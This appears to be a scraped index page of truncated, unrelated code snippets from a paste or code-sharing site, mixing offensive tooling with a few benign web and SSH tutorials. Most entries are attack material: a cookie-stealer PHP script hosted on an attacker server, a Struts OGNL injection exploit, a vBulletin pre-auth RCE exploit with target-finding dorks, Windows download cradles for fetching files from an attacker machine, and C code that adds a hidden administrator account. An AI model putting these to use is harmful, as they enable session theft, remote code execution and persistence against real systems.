// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// change this google.com to same website, which you are attacking, so that Victim can't detect. //
// you can find cookie into same directory where you put this file, name log.txt //
<?php
header ('Location:https://google.com');
$cookies = $_GET["c&q...
Score: 0
The two most common HTTP methods are: GET and POST.
What is HTTP?
The Hypertext Transfer Protocol (HTTP) is designed to enable communications between clients and servers.
HTTP works as a request-response protocol between a client and server.
A web browser may be the client, and an application on a computer that hosts a web site may be the serve...
Score: 0
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload +...
Score: 0
Set up the tunnel with this command:
ssh -D <your_ip>:<sock5_port> -f -C -q -N <user>@<server_ip>
ex.
ssh -D 192.168.64.64:6464 -f -C -q -N ud64@172.245.64.64
For local access remove IP:
ssh -D 6464 -f -C -q -N ud64@172.245.64.64
Explanation of arguments
-D: Tells SSH that we want a SOCKS tunnel on the specified por...
Score: 0
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.ar...
Score: 0
Recently (at the end of 2017), OWASP updated its Top 10 list. For the unfamiliar, let me briefly explain what that means: the industry standard of basic-web-security education has altered. Though it’s never been a complete security education, the OWASP Top Ten is where almost all standards for web-developer security education begin. So when it ch...
Score: 0
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTI...
Score: 0
Usage: cscript wget.vbs http://[URL (including file)] [filename to save to]
On attacker machine:
copy file to transfer to: **/var/www**
start apache: **service apache2 start**
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT...
Score: 0
Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Make sure to change the values for $url and $file before sending the commands
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[---URL (with filepath)-...
Score: 0
#include <stdlib.h>
int main()
{
int i;
int j;
i = system("net user [---username---] [---password---] /add");
j = system("net localgroup administrators [---username---] /add");
return 0;
}
...
Score: 0